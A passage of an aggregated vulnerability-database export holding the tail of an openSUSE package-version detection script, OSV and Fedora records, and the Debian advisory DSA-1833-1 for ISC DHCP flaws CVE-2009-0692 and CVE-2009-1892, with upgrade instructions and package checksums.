isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios\", rpm:\"nagios~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios-devel\", rpm:\"nagios-devel~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nagios-www\", rpm:\"nagios-www~3.0.6~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.4p4~44.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.4p4~44.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pam_mount\", rpm:\"pam_mount~0.35~15.8\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.0~17.9\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.0.0~17.9\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"eID-belgium\", rpm:\"eID-belgium~2.5.9~119.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.159.0~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good\", rpm:\"gstreamer010-plugins-good~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good-doc\", rpm:\"gstreamer010-plugins-good-doc~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gstreamer010-plugins-good-extra\", rpm:\"gstreamer010-plugins-good-extra~0.10.6~41.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.10\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.10\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pam_mount\", rpm:\"pam_mount~0.18~84.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~0.99.6~31.15\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~0.99.6~31.15\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xntp\", rpm:\"xntp~4.2.4p3~25.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xntp-doc\", rpm:\"xntp-doc~4.2.4p3~25.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osv": [{"lastseen": "2023-06-28T06:35:52", "description": "\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\n\n* [CVE-2009-0692](https://security-tracker.debian.org/tracker/CVE-2009-0692)\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution.\n* [CVE-2009-1892](https://security-tracker.debian.org/tracker/CVE-2009-1892)\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using \"dhcp-client-identifier\"\nand \"hardware ethernet\". This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap.\n\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\n\nWe recommend that you upgrade your dhcp3 packages.\n\n\n", "cvss3": {}, "published": "2009-07-14T00:00:00", "type": "osv", "title": "dhcp3 - arbitrary code execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2023-06-28T06:35:12", "id": "OSV:DSA-1833-1", "href": "https://osv.dev/vulnerability/DSA-1833-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-28T06:35:53", "description": "\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\n\n* [CVE-2009-0692](https://security-tracker.debian.org/tracker/CVE-2009-0692)\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution.\n* [CVE-2009-1892](https://security-tracker.debian.org/tracker/CVE-2009-1892)\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using \"dhcp-client-identifier\"\nand \"hardware ethernet\". This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap.\n\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\n\nWe recommend that you upgrade your dhcp3 packages.\n\n\n", "cvss3": {}, "published": "2009-07-14T00:00:00", "type": "osv", "title": "dhcp3 - arbitrary code execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2023-06-28T06:35:12", "id": "OSV:DSA-1833-2", "href": "https://osv.dev/vulnerability/DSA-1833-2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. The dhcp package includes the ISC DHCP service and relay agent. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "cvss3": {}, "published": "2009-11-10T17:47:15", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: dhcp-4.1.0p1-4.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2009-11-10T17:47:15", "id": "FEDORA:09D3210F8A0", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JQ4XEIIOK5G2KZ2NDE6JFTEGDDFGRDRG/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. The dhcp package includes the ISC DHCP service and relay agent. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "cvss3": {}, "published": "2009-08-25T22:12:17", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: dhcp-4.0.0-37.fc10", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892"], "modified": "2009-08-25T22:12:17", "id": "FEDORA:D298810F881", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/A7AVACYMP35LQASAAJZMTDDDDQDQMOYC/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "DHCP (Dynamic Host Configuration Protocol) is a protocol which allows individual devices on an IP network to get their own network configuration information (IP address, subnetmask, broadcast address, etc.) from a DHCP server. The overall purpose of DHCP is to make it easier to administer a large network. The dhcp package includes the ISC DHCP service and relay agent. To use DHCP on your network, install a DHCP service (or relay agent), and on clients run a DHCP client daemon. The dhcp package provides the ISC DHCP service and relay agent. ", "cvss3": {}, "published": "2010-06-24T16:20:01", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: dhcp-4.1.0p1-6.fc11", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0692", "CVE-2009-1892", "CVE-2010-2156"], "modified": "2010-06-24T16:20:01", "id": "FEDORA:7B83E111241", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/O4BJ6EYYSDGCW42Z27QV6QVC5LSDMPSY/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1833-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 14, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : dhcp3\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id&#40;s&#41; : CVE-2009-0692 CVE-2009-1892\r\nCERT advisory : VU#410676\r\n\r\nSeveral remote vulnerabilities have been discovered in ISC&#39;s DHCP\r\nimplementation:\r\n\r\nIt was discovered that dhclient does not properly handle overlong\r\nsubnet mask options, leading to a stack-based buffer overflow and\r\npossible arbitrary code execution. &#40;CVE-2009-0692&#41;\r\n\r\nChristoph Biedl discovered that the DHCP server may terminate when\r\nreceiving certain well-formed DHCP requests, provided that the server\r\nconfiguration mixes host definitions using &quot;dhcp-client-identifier&quot;\r\nand &quot;hardware ethernet&quot;. This vulnerability only affects the lenny\r\nversions of dhcp3-server and dhcp3-server-ldap. &#40;CVE-2009-1892&#41;\r\n\r\nFor the old stable distribution &#40;etch&#41;, these problems have been fixed\r\nin version 3.0.4-13+etch2.\r\n\r\nFor the stable distribution &#40;lenny&#41;, this problem has been fixed in\r\nversion 3.1.1-6+lenny2.\r\n\r\nFor the unstable distribution &#40;sid&#41;, these problems will be fixed\r\nsoon.\r\n\r\nWe recommend that you upgrade your dhcp3 packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.diff.gz\r\n Size/MD5 checksum: 116721 6d49a9fb6b0617aba87cd90abef5bd57\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4.orig.tar.gz\r\n Size/MD5 checksum: 721450 aeb916fbb50edc320f142cd6a74cb48c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.0.4-13+etch2.dsc\r\n Size/MD5 checksum: 1077 50aac538f9bb0e11e878758d754b1e14\r\n\r\nalpha architecture &#40;DEC Alpha&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 157948 502301a6539a30b14cd2d6c8fb1bd032\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 113528 c89f3dfd91bbb2d8850359b78f5eae66\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_alpha.udeb\r\n Size/MD5 checksum: 192724 a4b5cab9e6f14ad9a80bef648435b86c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 240720 48996d54bf9d3fbae7d0a4f2b0e76224\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 304078 2e58f7af0c23b07b81b7e88031ec22b1\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_alpha.deb\r\n Size/MD5 checksum: 346552 96169b1056055a13cbfb13fb8f73b061\r\n\r\namd64 architecture &#40;AMD x86_64 &#40;AMD64&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_amd64.udeb\r\n Size/MD5 checksum: 174734 3de2c8f75f8d6df63870c2d9638c8ae6\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 287422 052994dc5544eacac9b22837bba47660\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 222104 185470021c69635074e4d09a05275f49\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 131134 33fbb0278c39d36b2a0dd3819e192493\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 321874 e3ce73d54b47a930e440626672fcd521\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_amd64.deb\r\n Size/MD5 checksum: 103610 04e95fd257de2ca592e09cf8927b9c37\r\n\r\narm architecture &#40;ARM&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 99498 8098ab4856d359049538213ec0fa4a75\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_arm.udeb\r\n Size/MD5 checksum: 167040 21fcc83a87ed431f9d03b0479b522dd2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 280430 9355307446248854bffbe49a2120d450\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 215172 0ab20469ee9fe1ccf05bfe40b68bc2d7\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 123860 2b69130163d2cb83009710081a5be3ea\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_arm.deb\r\n Size/MD5 checksum: 314402 191cff362f2ceb557495d037aa2310c8\r\n\r\nhppa architecture &#40;HP PA RISC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 103994 3cbfc2d7eea1de9bf64f84d31889bf75\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_hppa.udeb\r\n Size/MD5 checksum: 171728 68bc286a4261035d72bbb1a63eb08dd9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 219790 b8e006bf59ac068513e4bb35c4c96d2d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 139516 ee6ad7d1fd911b98cd40290823cdd50d\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 319134 d36a40e22c468e76386b2ab6befd8424\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_hppa.deb\r\n Size/MD5 checksum: 285302 09641cca4ba379d61c1dca0fbde543fb\r\n\r\ni386 architecture &#40;Intel ia32&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 265170 5f0e7243ba3c59251a236b332fa0818f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 290962 ecb192ccc56b7982a8c60e54e4d55bbb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 198194 fe580c33e7953d727015063e3e24d209\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 92416 686a574fea049cf930757230f86af87b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_i386.udeb\r\n Size/MD5 checksum: 150410 d3747839582b942b155f427a4034f6b7\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_i386.deb\r\n Size/MD5 checksum: 116952 340249d4e0ba06007f063b501dfeac0e\r\n\r\nia64 architecture &#40;Intel ia64&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 460536 81350e4d73103ffe454ae70a3f2ab967\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 381784 161f51028930ea9a1a078e9f6bc8070c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 325064 b51fa5cffbfd6e8daa2319ce287e6310\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 182712 0961dfa19e58b2fda1b397cccf0c56b2\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_ia64.udeb\r\n Size/MD5 checksum: 276972 7f96a3e76a36e8ecb74ae56a3066db91\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_ia64.deb\r\n Size/MD5 checksum: 150950 b62bfa283012eefe6123e4d57eafb95b\r\n\r\nmips architecture &#40;MIPS &#40;Big Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mips.udeb\r\n Size/MD5 checksum: 178822 f5413f7bc85b1c4f2b1c5fc1310b5101\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 290490 a1df2dcfa3ccd3b787822d92979d1879\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 227208 6795dad252df73ccad7093284117bc14\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 137836 f3cb677fc63e5ad63d0ffb038bac2d8e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 327612 a84dd37caf4e3a076d17fbb30e242656\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mips.deb\r\n Size/MD5 checksum: 107814 a6c576fe51309fa51bc852e3cb061051\r\n\r\nmipsel architecture &#40;MIPS &#40;Little Endian&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 289074 4c60b9d7ed1e6ebcc0a3e4233b4bad3b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 225724 65671425f5a4d6468933dd782807ad0b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 107314 2be8a4eb41d646e9aee26f1f2c02e63b\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_mipsel.udeb\r\n Size/MD5 checksum: 177428 38810775a90a8dcaf51ecd4b62ff62d3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 137384 e5b6a97e69a9b63f22762bf74c79bdfe\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_mipsel.deb\r\n Size/MD5 checksum: 325660 db87a9bd8bcf73ffab1bf87171c4d18f\r\n\r\npowerpc architecture &#40;PowerPC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 95268 51a2d9e53a0d0d9bf3d948f8d2a045e4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 270644 29d8e657d95c12f489215de503c24ffb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_powerpc.udeb\r\n Size/MD5 checksum: 155886 0ac02169c239b24ad9fddfa5e237186a\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 130298 d93a5ddd00026cbaccd7a43c12d7eed5\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 204226 b9c8f25ae0502d86a0db2a3ebeacee88\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_powerpc.deb\r\n Size/MD5 checksum: 299368 5022ae153ee18c6684c1b5a8b7c78a8f\r\n\r\nsparc architecture &#40;Sun SPARC/UltraSPARC&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 202674 3219218e6e886505c7268e30344a199e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 125748 c3678c9c265ad4288a77147d99038b33\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 95246 db0c1035d5aefd6fc9a1682c3ea6fefb\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 296420 2a73341aa7331f0ab4038fc3587850bf\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.0.4-13+etch2_sparc.deb\r\n Size/MD5 checksum: 268822 6a6380bdd4dfc204e602f86c3f5e2ae9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.0.4-13+etch2_sparc.udeb\r\n Size/MD5 checksum: 154910 6dc0420162294571d894ed490d569fe9\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1.orig.tar.gz\r\n Size/MD5 checksum: 798228 fcc19330a9c3a0efb5620409214652a9\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.diff.gz\r\n Size/MD5 checksum: 128880 72d4201330b347bfd5ccb15cad39c98f\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3_3.1.1-6+lenny2.dsc\r\n Size/MD5 checksum: 1488 595d2c450fe04edac8e5fcf916480a84\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp-client_3.1.1-6+lenny2_all.deb\r\n Size/MD5 checksum: 22976 0216788c7652496df9d297d3df2a81e7\r\n\r\nalpha architecture &#40;DEC Alpha&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 394400 cb8559b314619922a91374579d6959c4\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-dev_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 148276 a8a666404ecf773eaeaab5a2423b540e\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server-ldap_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 348508 cfc96c8147d27237b57e4e698f393cda\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-relay_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 127480 989117e4e0bd1b90cbd5cd0ec06377d0\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 271974 b36ad4833551063757e31562c713d4ae\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client-udeb_3.1.1-6+lenny2_alpha.udeb\r\n Size/MD5 checksum: 215130 326aaed7e5144102deed214c5ab6a14c\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-common_3.1.1-6+lenny2_alpha.deb\r\n Size/MD5 checksum: 333764 b8ebbb4d8a8ac528a685490483da09f1\r\n\r\namd64 architecture &#40;AMD x86_64 &#40;AMD64&#41;&#41;\r\n\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-server_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 358390 68dccbc7e63ffb59c9ef2af3bfe4c7b3\r\n http://security.debian.org/pool/updates/main/d/dhcp3/dhcp3-client_3.1.1-6+lenny2_amd64.deb\r\n Size/MD5 checksum: 245198 4cd491f7be9374393a4d9c8687b8276a\r\n 